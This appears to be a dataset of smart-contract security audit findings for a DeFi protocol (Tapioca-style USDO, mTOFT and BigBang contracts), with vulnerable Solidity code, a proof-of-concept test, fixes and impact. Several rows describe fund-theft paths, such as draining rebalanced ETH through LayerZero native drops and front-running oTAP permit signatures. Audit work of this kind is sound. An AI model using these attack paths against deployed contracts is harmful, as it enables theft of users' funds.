`address(this)` has approved sufficient amount of `tokenIn` to the `router`. However, it currently checks the allowance of `_msgSender()`, which is unnecessary and may cause transaction reverting if `_msgSender` had previously approved the `router`.\\n```\\n function _transferTokenInAndApprove(\\n address router,\\n IERC20 tokenIn,\\n uint256 amount\\n )\\n internal\\n {\\n tokenIn.safeTransferFrom(_msgSender(), address(this), amount);\\n//@ The check of allowance is useless, we should check the allowance from address(this) rather than the msgSender\\n if (tokenIn.allowance(_msgSender(), router) < amount) {\\n tokenIn.forceApprove(router, amount);\\n }\\n }\\n```\\n\\nPOC\\nApply the patch to `asynchronous-vault/test/Zapper/ZapperDeposit.t.sol` to add the test case and run it with `forge test --match-test test_zapIn --ffi`.\\n```\\ndiff --git a/asynchronous-vault/test/Zapper/ZapperDeposit.t.sol b/asynchronous-vault/test/Zapper/ZapperDeposit.t.sol\\nindex 9083127..ff11b56 100644\\n--- a/asynchronous-vault/test/Zapper/ZapperDeposit.t.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/asynchronous-vault/test/Zapper/ZapperDeposit.t.sol\\n@@ -17,6 // Add the line below\\n17,25 @@ contract VaultZapperDeposit is OffChainCalls {\\n zapper = new VaultZapper();\\n }\\n\\n// Add the line below\\n function test_zapIn() public {\\n// Add the line below\\n Swap memory params =\\n// Add the line below\\n Swap(_router, _USDC, _WSTETH, 1500 * 1e6, 1, address(0), 20);\\n// Add the line below\\n _setUpVaultAndZapper(_WSTETH);\\n// Add the line below\\n\\n// Add the line below\\n IERC4626 vault = _vault;\\n// Add the line below\\n bytes memory swapData =\\n// Add the line below\\n _getSwapData(address(zapper), address(zapper), params);\\n// Add the line below\\n\\n// Add the line below\\n _getTokenIn(params);\\n// Add the line below\\n\\n// Add the line below\\n // If the msgSender() happend to approve the SwapRouter before, then the zap will always revert\\n// Add the line below\\n IERC20(params.tokenIn).approve(address(params.router), params.amount);\\n// Add the line below\\n zapper.zapAndDeposit(\\n// Add the line below\\n params.tokenIn, vault, params.router, params.amount, swapData\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n }\\n// Add the line below\\n\\n //// test_zapAndDeposit ////\\n function test_zapAndDepositUsdcWSTETH() public {\\n Swap memory usdcToWstEth =\\n```\\n\\nResult:\\n```\\nRan 1 test for test/Zapper/ZapperDeposit.t.sol:VaultZapperDeposit\\n[FAIL. Reason: SwapFailed(""\\u{8}�y�\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0 \\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0(ERC20: transfer amount exceeds allowance\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0"")] test_zapIn() (gas: 4948462)\\nSuite result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 20.84s (18.74s CPU time)\\n\\nRan 1 test suite in 22.40s (20.84s CPU time): 0 tests passed, 1 failed, 0 skipped (1 total tests)\\n\\nFailing tests:\\nEncountered 1 failing test in test/Zapper/ZapperDeposit.t.sol:VaultZapperDeposit\\n[FAIL. Reason: SwapFailed(""\\u{8}�y�\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0 \\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0(ERC20: transfer amount exceeds allowance\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0"")] test_zapIn() (gas: 4948462)\\n```\\n","Fix the issue:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/asynchronous// Remove the line below\\nvault/src/VaultZapper.sol b/asynchronous// Remove the line below\\nvault/src/VaultZapper.sol\\nindex 9943535..9cf6df9 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/asynchronous// Remove the line below\\nvault/src/VaultZapper.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/asynchronous// Remove the line below\\nvault/src/VaultZapper.sol\\n@@ // Remove the line below\\n165,7 // Add the line below\\n165,7 @@ contract VaultZapper is Ownable2Step, Pausable {\\n internal\\n {\\n tokenIn.safeTransferFrom(_msgSender(), address(this), amount);\\n// Remove the line below\\n if (tokenIn.allowance(_msgSender(), router) < amount) {\\n// Add the line below\\n if (tokenIn.allowance(address(this), router) < amount) {\\n tokenIn.forceApprove(router, amount);\\n }\\n }\\n```\\n","This issue could lead to transaction reverting when users interact with the contract normally, thereby affecting the contract's regular functionality.","```\\n function _transferTokenInAndApprove(\\n address router,\\n IERC20 tokenIn,\\n uint256 amount\\n )\\n internal\\n {\\n tokenIn.safeTransferFrom(_msgSender(), address(this), amount);\\n//@ The check of allowance is useless, we should check the allowance from address(this) rather than the msgSender\\n if (tokenIn.allowance(_msgSender(), router) < amount) {\\n tokenIn.forceApprove(router, amount);\\n }\\n }\\n```\\n" +Unupdated totalBorrow After BigBang Liquidation,high,"During the liquidation process, BigBang only reduces the user's `userBorrowPart[user]`, but fails to update the global `totalBorrow`. Consequently, all subsequent debt calculations are incorrect.\\nCurrently, the implementation relies on the `BBLiquidation._updateBorrowAndCollateralShare()` method to calculate user debt repayment and collateral collection. The code snippet is as follows:\\n```\\n function _liquidateUser(\\n address user,\\n uint256 maxBorrowPart,\\n IMarketLiquidatorReceiver _liquidatorReceiver,\\n bytes calldata _liquidatorReceiverData,\\n uint256 _exchangeRate,\\n uint256 minLiquidationBonus\\n ) private {\\n uint256 callerReward = _getCallerReward(user, _exchangeRate);\\n\\n (uint256 borrowAmount,, uint256 collateralShare) =\\n _updateBorrowAndCollateralShare(user, maxBorrowPart, minLiquidationBonus, _exchangeRate);\\n totalCollateralShare = totalCollateralShare > collateralShare ? totalCollateralShare - collateralShare : 0;\\n uint256 borrowShare = yieldBox.toShare(assetId, borrowAmount, true);\\n\\n (uint256 returnedShare,) =\\n _swapCollateralWithAsset(collateralShare, _liquidatorReceiver, _liquidatorReceiverData);\\n if (returnedShare < borrowShare) revert AmountNotValid();\\n\\n (uint256 feeShare, uint256 callerShare) = _extractLiquidationFees(returnedShare, borrowShare, callerReward);\\n\\n IUsdo(address(asset)).burn(address(this), borrowAmount);\\n\\n address[] memory _users = new address[](1);\\n _users[0] = user;\\n emit Liquidated(msg.sender, _users, callerShare, feeShare, borrowAmount, collateralShare);\\n }\\n\\n function _updateBorrowAndCollateralShare(\\n address user,\\n uint256 maxBorrowPart,\\n uint256 minLiquidationBonus, // min liquidation bonus to accept (default 0)\\n uint256 _exchangeRate\\n ) private returns (uint256 borrowAmount, uint256 borrowPart, uint256 collateralShare) {\\n if (_exchangeRate == 0) revert ExchangeRateNotValid();\\n\\n // get collateral amount in asset's value\\n uint256 collateralPartInAsset = (\\n yieldBox.toAmount(collateralId, userCollateralShare[user], false) * EXCHANGE_RATE_PRECISION\\n ) / _exchangeRate;\\n\\n // compute closing factor (liquidatable amount)\\n uint256 borrowPartWithBonus =\\n computeClosingFactor(userBorrowPart[user], collateralPartInAsset, FEE_PRECISION_DECIMALS);\\n\\n // limit liquidable amount before bonus to the current debt\\n uint256 userTotalBorrowAmount = totalBorrow.toElastic(userBorrowPart[user], true);\\n borrowPartWithBonus = borrowPartWithBonus > userTotalBorrowAmount ? userTotalBorrowAmount : borrowPartWithBonus;\\n\\n // check the amount to be repaid versus liquidator supplied limit\\n borrowPartWithBonus = borrowPartWithBonus > maxBorrowPart ? maxBorrowPart : borrowPartWithBonus;\\n borrowAmount = borrowPartWithBonus;\\n\\n // compute part units, preventing rounding dust when liquidation is full\\n borrowPart = borrowAmount == userTotalBorrowAmount\\n ? userBorrowPart[user]\\n : totalBorrow.toBase(borrowPartWithBonus, false);\\n if (borrowPart == 0) revert Solvent();\\n\\n if (liquidationBonusAmount > 0) {\\n borrowPartWithBonus = borrowPartWithBonus + (borrowPartWithBonus * liquidationBonusAmount) / FEE_PRECISION;\\n }\\n\\n if (collateralPartInAsset < borrowPartWithBonus) {\\n if (collateralPartInAsset <= userTotalBorrowAmount) {\\n revert BadDebt();\\n }\\n // If current debt is covered by collateral fully\\n // then there is some liquidation bonus,\\n // so liquidation can proceed if liquidator's minimum is met\\n if (minLiquidationBonus > 0) {\\n // `collateralPartInAsset > borrowAmount` as `borrowAmount <= userTotalBorrowAmount`\\n uint256 effectiveBonus = ((collateralPartInAsset - borrowAmount) * FEE_PRECISION) / borrowAmount;\\n if (effectiveBonus < minLiquidationBonus) {\\n revert InsufficientLiquidationBonus();\\n }\\n collateralShare = userCollateralShare[user];\\n } else {\\n revert InsufficientLiquidationBonus();\\n }\\n } else {\\n collateralShare =\\n yieldBox.toShare(collateralId, (borrowPartWithBonus * _exchangeRate) / EXCHANGE_RATE_PRECISION, false);\\n if (collateralShare > userCollateralShare[user]) {\\n revert NotEnoughCollateral();\\n }\\n }\\n\\n userBorrowPart[user] -= borrowPart;\\n userCollateralShare[user] -= collateralShare;\\n }\\n```\\n\\nThe methods mentioned above update the user-specific variables `userBorrowPart[user]` and `userCollateralShare[user]` within the `_updateBorrowAndCollateralShare()` method. Additionally, the global variable `totalCollateralShare` is updated within the `_liquidateUser()` method.\\nHowever, there's another crucial global variable, `totalBorrow`, which remains unaltered throughout the entire liquidation process.\\nFailure to update `totalBorrow` during liquidation will result in incorrect subsequent loan-related calculations.\\nNote: SGL Liquidation has the same issues","```\\n function _liquidateUser(\\n address user,\\n uint256 maxBorrowPart,\\n IMarketLiquidatorReceiver _liquidatorReceiver,\\n bytes calldata _liquidatorReceiverData,\\n uint256 _exchangeRate,\\n uint256 minLiquidationBonus\\n ) private {\\n uint256 callerReward = _getCallerReward(user, _exchangeRate);\\n\\n// Remove the line below\\n (uint256 borrowAmount,, uint256 collateralShare) =\\n// Add the line below\\n (uint256 borrowAmount,uint256 borrowPart, uint256 collateralShare) =\\n _updateBorrowAndCollateralShare(user, maxBorrowPart, minLiquidationBonus, _exchangeRate);\\n totalCollateralShare = totalCollateralShare > collateralShare ? totalCollateralShare // Remove the line below\\n collateralShare : 0;\\n// Add the line below\\n totalBorrow.elastic // Remove the line below\\n= borrowAmount.toUint128();\\n// Add the line below\\n totalBorrow.base // Remove the line below\\n= borrowPart.toUint128();\\n```\\n","The lack of an update to `totalBorrow` during liquidation leads to inaccuracies in subsequent loan-related calculations. For instance, this affects interest accumulation and the amount of interest due.","```\\n function _liquidateUser(\\n address user,\\n uint256 maxBorrowPart,\\n IMarketLiquidatorReceiver _liquidatorReceiver,\\n bytes calldata _liquidatorReceiverData,\\n uint256 _exchangeRate,\\n uint256 minLiquidationBonus\\n ) private {\\n uint256 callerReward = _getCallerReward(user, _exchangeRate);\\n\\n (uint256 borrowAmount,, uint256 collateralShare) =\\n _updateBorrowAndCollateralShare(user, maxBorrowPart, minLiquidationBonus, _exchangeRate);\\n totalCollateralShare = totalCollateralShare > collateralShare ? totalCollateralShare - collateralShare : 0;\\n uint256 borrowShare = yieldBox.toShare(assetId, borrowAmount, true);\\n\\n (uint256 returnedShare,) =\\n _swapCollateralWithAsset(collateralShare, _liquidatorReceiver, _liquidatorReceiverData);\\n if (returnedShare < borrowShare) revert AmountNotValid();\\n\\n (uint256 feeShare, uint256 callerShare) = _extractLiquidationFees(returnedShare, borrowShare, callerReward);\\n\\n IUsdo(address(asset)).burn(address(this), borrowAmount);\\n\\n address[] memory _users = new address[](1);\\n _users[0] = user;\\n emit Liquidated(msg.sender, _users, callerShare, feeShare, borrowAmount, collateralShare);\\n }\\n\\n function _updateBorrowAndCollateralShare(\\n address user,\\n uint256 maxBorrowPart,\\n uint256 minLiquidationBonus, // min liquidation bonus to accept (default 0)\\n uint256 _exchangeRate\\n ) private returns (uint256 borrowAmount, uint256 borrowPart, uint256 collateralShare) {\\n if (_exchangeRate == 0) revert ExchangeRateNotValid();\\n\\n // get collateral amount in asset's value\\n uint256 collateralPartInAsset = (\\n yieldBox.toAmount(collateralId, userCollateralShare[user], false) * EXCHANGE_RATE_PRECISION\\n ) / _exchangeRate;\\n\\n // compute closing factor (liquidatable amount)\\n uint256 borrowPartWithBonus =\\n computeClosingFactor(userBorrowPart[user], collateralPartInAsset, FEE_PRECISION_DECIMALS);\\n\\n // limit liquidable amount before bonus to the current debt\\n uint256 userTotalBorrowAmount = totalBorrow.toElastic(userBorrowPart[user], true);\\n borrowPartWithBonus = borrowPartWithBonus > userTotalBorrowAmount ? userTotalBorrowAmount : borrowPartWithBonus;\\n\\n // check the amount to be repaid versus liquidator supplied limit\\n borrowPartWithBonus = borrowPartWithBonus > maxBorrowPart ? maxBorrowPart : borrowPartWithBonus;\\n borrowAmount = borrowPartWithBonus;\\n\\n // compute part units, preventing rounding dust when liquidation is full\\n borrowPart = borrowAmount == userTotalBorrowAmount\\n ? userBorrowPart[user]\\n : totalBorrow.toBase(borrowPartWithBonus, false);\\n if (borrowPart == 0) revert Solvent();\\n\\n if (liquidationBonusAmount > 0) {\\n borrowPartWithBonus = borrowPartWithBonus + (borrowPartWithBonus * liquidationBonusAmount) / FEE_PRECISION;\\n }\\n\\n if (collateralPartInAsset < borrowPartWithBonus) {\\n if (collateralPartInAsset <= userTotalBorrowAmount) {\\n revert BadDebt();\\n }\\n // If current debt is covered by collateral fully\\n // then there is some liquidation bonus,\\n // so liquidation can proceed if liquidator's minimum is met\\n if (minLiquidationBonus > 0) {\\n // `collateralPartInAsset > borrowAmount` as `borrowAmount <= userTotalBorrowAmount`\\n uint256 effectiveBonus = ((collateralPartInAsset - borrowAmount) * FEE_PRECISION) / borrowAmount;\\n if (effectiveBonus < minLiquidationBonus) {\\n revert InsufficientLiquidationBonus();\\n }\\n collateralShare = userCollateralShare[user];\\n } else {\\n revert InsufficientLiquidationBonus();\\n }\\n } else {\\n collateralShare =\\n yieldBox.toShare(collateralId, (borrowPartWithBonus * _exchangeRate) / EXCHANGE_RATE_PRECISION, false);\\n if (collateralShare > userCollateralShare[user]) {\\n revert NotEnoughCollateral();\\n }\\n }\\n\\n userBorrowPart[user] -= borrowPart;\\n userCollateralShare[user] -= collateralShare;\\n }\\n```\\n" +"`_computeClosingFactor` function will return incorrect values, lower than needed, because it uses `collateralizationRate` to calculate the denominator",high,"`_computeClosingFactor` is used to calculate the required borrow amount that should be liquidated to make the user's position solvent. However, this function uses `collateralizationRate` (defaulting to 75%) to calculate the liquidated amount, while the threshold to be liquidatable is `liquidationCollateralizationRate` (defaulting to 80%). Therefore, it will return incorrect liquidated amount.\\nIn `_computeClosingFactor` of Market contract:\\n```\\n//borrowPart and collateralPartInAsset should already be scaled due to the exchange rate computation\\nuint256 liquidationStartsAt =\\n (collateralPartInAsset * _liquidationCollateralizationRate) / (10 ** ratesPrecision);///80% collateral value in asset in default\\n\\nif (borrowPart < liquidationStartsAt) return 0;\\n\\n//compute numerator\\nuint256 numerator = borrowPart - liquidationStartsAt;\\n//compute denominator\\nuint256 diff =\\n (collateralizationRate * ((10 ** ratesPrecision) + _liquidationMultiplier)) / (10 ** ratesPrecision);\\nint256 denominator = (int256(10 ** ratesPrecision) - int256(diff)) * int256(1e13);\\n\\n//compute closing factor\\nint256 x = (int256(numerator) * int256(1e18)) / denominator;\\n```\\n\\nA user will be able to be liquidated if their ratio between borrow and collateral value exceeds `liquidationCollateralizationRate` (see `_isSolvent()` function). However, `_computeClosingFactor` uses `collateralizationRate` (defaulting to 75%) to calculate the denominator for the needed liquidate amount, while the numerator is calculated by using `liquidationCollateralizationRate` (80% in default). These variables were initialized in `_initCoreStorage()`.\\nIn the above calculation of `_computeClosingFactor` function, in default: `_liquidationMultiplier` = 12%, `numerator` = `borrowPart` - `liquidationStartsAt` = borrowAmount - 80% * collateralToAssetAmount => x will be: `numerator` / (1 - 75% * 112%) = `numerator` / 16%\\nHowever, during a partial liquidation of BigBang or Singularity, the actual collateral bonus is `liquidationBonusAmount`, defaulting to 10%. (code snippet). Therefore, the minimum liquidated amount required to make user solvent (unable to be liquidated again) is: numerator / (1 - 80% * 110%) = numerator / 12%.\\nAs result, `computeClosingFactor()` function will return a lower liquidated amount than needed to make user solvent, even when that function attempts to over-liquidate with `_liquidationMultiplier` > `liquidationBonusAmount`.",Use `liquidationCollateralizationRate` instead of `collateralizationRate` to calculate the denominator in `_computeClosingFactor`,"This issue will result in the user still being liquidatable after a partial liquidation because it liquidates a lower amount than needed. Therefore, the user will never be solvent again after they are undercollateralized until their position is fully liquidated. This may lead to the user being liquidated more than expected, or experiencing a loss of funds in attempting to recover their position.",```\\n//borrowPart and collateralPartInAsset should already be scaled due to the exchange rate computation\\nuint256 liquidationStartsAt =\\n (collateralPartInAsset * _liquidationCollateralizationRate) / (10 ** ratesPrecision);///80% collateral value in asset in default\\n\\nif (borrowPart < liquidationStartsAt) return 0;\\n\\n//compute numerator\\nuint256 numerator = borrowPart - liquidationStartsAt;\\n//compute denominator\\nuint256 diff =\\n (collateralizationRate * ((10 ** ratesPrecision) + _liquidationMultiplier)) / (10 ** ratesPrecision);\\nint256 denominator = (int256(10 ** ratesPrecision) - int256(diff)) * int256(1e13);\\n\\n//compute closing factor\\nint256 x = (int256(numerator) * int256(1e18)) / denominator;\\n```\\n +All ETH can be stolen during rebalancing for `mTOFTs` that hold native,high,"Rebalancing of ETH transfers the ETH to the destination `mTOFT` without calling `sgRecieve` which leaves the ETH hanging inside the `mTOFT` contract. This can be exploited to steal all the ETH.\\nRebalancing of `mTOFTs` that hold native tokens is done through the `routerETH` contract inside the `Balancer.sol` contract. Here is the code snippet for the `routerETH` contract:\\n```\\n## Balancer.sol\\n\\nif (address(this).balance < _amount) revert ExceedsBalance();\\n uint256 valueAmount = msg.value + _amount;\\n routerETH.swapETH{value: valueAmount}(\\n _dstChainId,\\n payable(this),\\n abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft),\\n _amount,\\n _computeMinAmount(_amount, _slippage)\\n );\\n```\\n\\nThe expected behaviour is ETH being received on the destination chain whereby `sgReceive` is called and ETH is deposited inside the `TOFTVault`.\\n```\\n## mTOFT.sol\\n\\n function sgReceive(uint16, bytes memory, uint256, address, uint256 amountLD, bytes memory) external payable {\\n if (msg.sender != _stargateRouter) revert mTOFT_NotAuthorized();\\n\\n if (erc20 == address(0)) {\\n vault.depositNative{value: amountLD}();\\n } else {\\n IERC20(erc20).safeTransfer(address(vault), amountLD);\\n }\\n }\\n```\\n\\nBy taking a closer look at the logic inside the `routerETH` contract we can see that the transfer is called with an empty payload:\\n```\\n // compose stargate to swap ETH on the source to ETH on the destination\\n function swapETH(\\n uint16 _dstChainId, // destination Stargate chainId\\n address payable _refundAddress, // refund additional messageFee to this address\\n bytes calldata _toAddress, // the receiver of the destination ETH\\n uint256 _amountLD, // the amount, in Local Decimals, to be swapped\\n uint256 _minAmountLD // the minimum amount accepted out on destination\\n ) external payable {\\n require(msg.value > _amountLD, ""Stargate: msg.value must be > _amountLD"");\\n\\n // wrap the ETH into WETH\\n IStargateEthVault(stargateEthVault).deposit{value: _amountLD}();\\n IStargateEthVault(stargateEthVault).approve(address(stargateRouter), _amountLD);\\n\\n // messageFee is the remainder of the msg.value after wrap\\n uint256 messageFee = msg.value - _amountLD;\\n\\n // compose a stargate swap() using the WETH that was just wrapped\\n stargateRouter.swap{value: messageFee}(\\n _dstChainId, // destination Stargate chainId\\n poolId, // WETH Stargate poolId on source\\n poolId, // WETH Stargate poolId on destination\\n _refundAddress, // message refund address if overpaid\\n _amountLD, // the amount in Local Decimals to swap()\\n _minAmountLD, // the minimum amount swap()er would allow to get out (ie: slippage)\\n IStargateRouter.lzTxObj(0, 0, ""0x""),\\n _toAddress, // address on destination to send to\\n bytes("""") // empty payload, since sending to EOA\\n );\\n }\\n```\\n\\nNotice the comment:\\nempty payload, since sending to EOA\\nSo `routerETH` after depositing ETH in `StargateEthVault` calls the regular `StargateRouter` but with an empty payload.\\nNext, let's see how the receiving logic works.\\nAs Stargate is just another application built on top of LayerZero the receiving starts inside the `Bridge::lzReceive` function. As the type of transfer is `TYPE_SWAP_REMOTE` the `router::swapRemote` is called:\\n```\\nfunction lzReceive(\\n uint16 _srcChainId,\\n bytes memory _srcAddress,\\n uint64 _nonce,\\n bytes memory _payload\\n) external override {\\n\\n\\n if (functionType == TYPE_SWAP_REMOTE) {\\n (\\n ,\\n uint256 srcPoolId,\\n uint256 dstPoolId,\\n uint256 dstGasForCall,\\n Pool.CreditObj memory c,\\n Pool.SwapObj memory s,\\n bytes memory to,\\n bytes memory payload\\n ) = abi.decode(_payload, (uint8, uint256, uint256, uint256, Pool.CreditObj, Pool.SwapObj, bytes, bytes));\\n address toAddress;\\n assembly {\\n toAddress := mload(add(to, 20))\\n }\\n router.creditChainPath(_srcChainId, srcPoolId, dstPoolId, c);\\n router.swapRemote(_srcChainId, _srcAddress, _nonce, srcPoolId, dstPoolId, dstGasForCall, toAddress, s, payload);\\n```\\n\\n`Router:swapRemote` has two responsibilities:\\nFirst it calls `pool::swapRemote` that transfers the actual tokens to the destination address. In this case this is the `mTOFT` contract.\\nSecond it will call `IStargateReceiver(mTOFTAddress)::sgReceive` but only if the payload is not empty.\\n```\\n function _swapRemote(\\n uint16 _srcChainId,\\n bytes memory _srcAddress,\\n uint256 _nonce,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n uint256 _dstGasForCall,\\n address _to,\\n Pool.SwapObj memory _s,\\n bytes memory _payload\\n) internal {\\n Pool pool = _getPool(_dstPoolId);\\n // first try catch the swap remote\\n try pool.swapRemote(_srcChainId, _srcPoolId, _to, _s) returns (uint256 amountLD) {\\n if (_payload.length > 0) {\\n // then try catch the external contract call\\n try IStargateReceiver(_to).sgReceive{gas: _dstGasForCall}(_srcChainId, _srcAddress, _nonce, pool.token(), amountLD, _payload) {\\n // do nothing\\n } catch (bytes memory reason) {\\n cachedSwapLookup[_srcChainId][_srcAddress][_nonce] = CachedSwap(pool.token(), amountLD, _to, _payload);\\n emit CachedSwapSaved(_srcChainId, _srcAddress, _nonce, pool.token(), amountLD, _to, _payload, reason);\\n }\\n }\\n } catch {\\n revertLookup[_srcChainId][_srcAddress][_nonce] = abi.encode(\\n TYPE_SWAP_REMOTE_RETRY,\\n _srcPoolId,\\n _dstPoolId,\\n _dstGasForCall,\\n _to,\\n _s,\\n _payload\\n );\\n emit Revert(TYPE_SWAP_REMOTE_RETRY, _srcChainId, _srcAddress, _nonce);\\n }\\n}\\n```\\n\\nAs payload is empty in case of using the `routerETH` contract the `sgReceive` function is never called. This means that the ETH is left sitting inside the `mTOFT` contract.\\n```\\n## TapiocaOmnichainSender.sol\\n\\n function sendPacket(LZSendParam calldata _lzSendParam, bytes calldata _composeMsg)\\n external\\n payable\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n // @dev Applies the token transfers regarding this send() operation.\\n // - amountDebitedLD is the amount in local decimals that was ACTUALLY debited from the sender.\\n // - amountToCreditLD is the amount in local decimals that will be credited to the recipient on the remote OFT instance.\\n (uint256 amountDebitedLD, uint256 amountToCreditLD) =\\n _debit(_lzSendParam.sendParam.amountLD, _lzSendParam.sendParam.minAmountLD, _lzSendParam.sendParam.dstEid);\\n\\n // @dev Builds the options and OFT message to quote in the endpoint.\\n (bytes memory message, bytes memory options) =\\n _buildOFTMsgAndOptions(_lzSendParam.sendParam, _lzSendParam.extraOptions, _composeMsg, amountToCreditLD);\\n\\n // @dev Sends the message to the LayerZero endpoint and returns the LayerZero msg receipt.\\n msgReceipt =\\n _lzSend(_lzSendParam.sendParam.dstEid, message, options, _lzSendParam.fee, _lzSendParam.refundAddress);\\n // @dev Formulate the OFT receipt.\\n oftReceipt = OFTReceipt(amountDebitedLD, amountToCreditLD);\\n\\n emit OFTSent(msgReceipt.guid, _lzSendParam.sendParam.dstEid, msg.sender, amountDebitedLD);\\n }\\n```\\n\\nAll he has to do is specify the option type `lzNativeDrop` inside the `_lsSendParams.extraOptions` and the cost of calling `_lzSend` plus the airdrop amount will be paid out from the balance of `mTOFT`.\\nAs this is a complete theft of the rebalanced amount I'm rating this as a critical vulnerability.","```\\nfunction swapETHAndCall(\\n uint16 _dstChainId, // destination Stargate chainId\\n address payable _refundAddress, // refund additional messageFee to this address\\n bytes calldata _toAddress, // the receiver of the destination ETH\\n SwapAmount memory _swapAmount, // the amount and the minimum swap amount\\n IStargateRouter.lzTxObj memory _lzTxParams, // the LZ tx params\\n bytes calldata _payload // the payload to send to the destination\\n ) external payable {\\n```\\n",All ETH can be stolen during rebalancing for mTOFTs that hold native tokens.,"```\\n## Balancer.sol\\n\\nif (address(this).balance < _amount) revert ExceedsBalance();\\n uint256 valueAmount = msg.value + _amount;\\n routerETH.swapETH{value: valueAmount}(\\n _dstChainId,\\n payable(this),\\n abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft),\\n _amount,\\n _computeMinAmount(_amount, _slippage)\\n );\\n```\\n" +"exerciseOptionsReceiver() Lack of Ownership Check for oTAP, Allowing Anyone to Use oTAPTokenID",high,"In UsdoOptionReceiverModule.exerciseOptionsReceiver(): For this method to execute successfully, the `owner` of the `oTAPTokenID` needs to approve it to `address(usdo)`. Once approved, anyone can front-run execute `exerciseOptionsReceiver()` and utilize this authorization.\\nIn `USDO.lzCompose()`, it is possible to specify `_msgType == MSG_TAP_EXERCISE` to execute `USDO.exerciseOptionsReceiver()` across chains.\\n```\\n function exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n// rest of code\\n ITapiocaOptionBroker(_options.target).exerciseOption(\\n _options.oTAPTokenID,\\n address(this), //payment token\\n _options.tapAmount\\n );\\n _approve(address(this), address(pearlmit), 0);\\n uint256 bAfter = balanceOf(address(this));\\n\\n // Refund if less was used.\\n if (bBefore > bAfter) {\\n uint256 diff = bBefore - bAfter;\\n if (diff < _options.paymentTokenAmount) {\\n IERC20(address(this)).safeTransfer(_options.from, _options.paymentTokenAmount - diff);\\n }\\n }\\n// rest of code\\n```\\n\\nFor this method to succeed, USDO must first obtain approve for the `oTAPTokenID`.\\nExample: The owner of `oTAPTokenID` is Alice.\\nalice in A chain execute lzSend(dstEid = B) with\\ncomposeMsg = [oTAP.permit(usdo,oTAPTokenID,v,r,s) 2.exerciseOptionsReceiver(oTAPTokenID,_options.from=alice) 3. oTAP.revokePermit(oTAPTokenID)]\\nin chain B USDO.lzCompose() will\\nexecute oTAP.permit(usdo,oTAPTokenID)\\nexerciseOptionsReceiver(srcChainSender=alice,_options.from=alice,oTAPTokenID )\\noTAP.revokePermit(oTAPTokenID)\\nThe signature of `oTAP.permit` is public, allowing anyone to use it.\\nNote: if alice call approve(oTAPTokenID,usdo) in chain B without signature, but The same result\\nThis opens up the possibility for malicious users to front-run use this signature. Let's consider an example with Bob:\\nBob in Chain A uses Alice's signature (v, r, s):\\ncomposeMsg = [oTAP.permit(usdo, oTAPTokenID, v, r, s), exerciseOptionsReceiver(oTAPTokenID, _options.from=bob)]-----> (Note: `_options.from` should be set to Bob.)\\nIn Chain B, when executing `USDO.lzCompose(dstEid = B)`, the following actions occur:\\nExecute `oTAP.permit(usdo, oTAPTokenID)`\\nExecute `exerciseOptionsReceiver(srcChainSender=bob, _options.from=bob, oTAPTokenID)`\\nAs a result, Bob gains unconditional access to this `oTAPTokenID`.\\nIt is advisable to check the ownership of `oTAPTokenID` is `_options.from` before executing `ITapiocaOptionBroker(_options.target).exerciseOption()`.","add check `_options.from` is owner or be approved\\n```\\n function exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n\\n// rest of code\\n uint256 bBefore = balanceOf(address(this));\\n// Add the line below\\n address oTap = ITapiocaOptionBroker(_options.target).oTAP();\\n// Add the line below\\n address oTapOwner = IERC721(oTap).ownerOf(_options.oTAPTokenID);\\n// Add the line below\\n require(oTapOwner == _options.from\\n// Add the line below\\n || IERC721(oTap).isApprovedForAll(oTapOwner,_options.from)\\n// Add the line below\\n || IERC721(oTap).getApproved(_options.oTAPTokenID) == _options.from\\n// Add the line below\\n ,""invalid"");\\n ITapiocaOptionBroker(_options.target).exerciseOption(\\n _options.oTAPTokenID,\\n address(this), //payment token\\n _options.tapAmount\\n );\\n _approve(address(this), address(pearlmit), 0);\\n uint256 bAfter = balanceOf(address(this));\\n\\n // Refund if less was used.\\n if (bBefore > bAfter) {\\n uint256 diff = bBefore - bAfter;\\n if (diff < _options.paymentTokenAmount) {\\n IERC20(address(this)).safeTransfer(_options.from, _options.paymentTokenAmount - diff);\\n }\\n }\\n }\\n```\\n","The `exerciseOptionsReceiver()` function lacks ownership checks for `oTAP`, allowing anyone to use `oTAPTokenID`.","```\\n function exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n// rest of code\\n ITapiocaOptionBroker(_options.target).exerciseOption(\\n _options.oTAPTokenID,\\n address(this), //payment token\\n _options.tapAmount\\n );\\n _approve(address(this), address(pearlmit), 0);\\n uint256 bAfter = balanceOf(address(this));\\n\\n // Refund if less was used.\\n if (bBefore > bAfter) {\\n uint256 diff = bBefore - bAfter;\\n if (diff < _options.paymentTokenAmount) {\\n IERC20(address(this)).safeTransfer(_options.from, _options.paymentTokenAmount - diff);\\n }\\n }\\n// rest of code\\n```\\n" +Wrong parameter in remote transfer makes it possible to steal all USDO balance from users,high,"Setting a wrong parameter when performing remote transfers enables an attack flow where USDO can be stolen from users.\\nThe following bug describes a way to 